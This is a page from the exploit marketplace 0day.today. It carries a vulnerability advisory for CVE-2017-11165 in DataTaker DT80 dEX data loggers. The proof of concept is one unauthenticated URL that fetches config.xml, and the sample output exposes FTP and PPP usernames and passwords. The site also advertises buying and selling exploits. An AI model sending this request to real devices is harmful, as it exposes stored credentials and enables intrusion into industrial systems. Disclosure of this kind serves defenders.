0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure [+] Credits / Discovery: Nassim Asrir [+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ [+] Author Company: Henceforth [+] CVE: CVE-2017-11165 Vendor: =============== http://www.datataker.com/ About: ======== The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display. The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution. Vulnerability Type: =================== Sensitive Configurations Exposure. issue: =================== dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI. POC: =================== http://victim/services/getFile.cmd?userfile=config.xml Output: ======== <config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0"> <environment> <application version="1.50.012" build="2014-01-07, 15:16:53"/> <flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/> <operatingSystem version="Windows 7"/><firmware version="9.14.5407"/> <screen resolution="1024x768"/> </environment> etc.... <loggerSetting category="PPP" profile="USER">username</loggerSetting> <loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting> <loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting> <loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting> <loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting> <loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting> # 0day.today [2024-09-28] #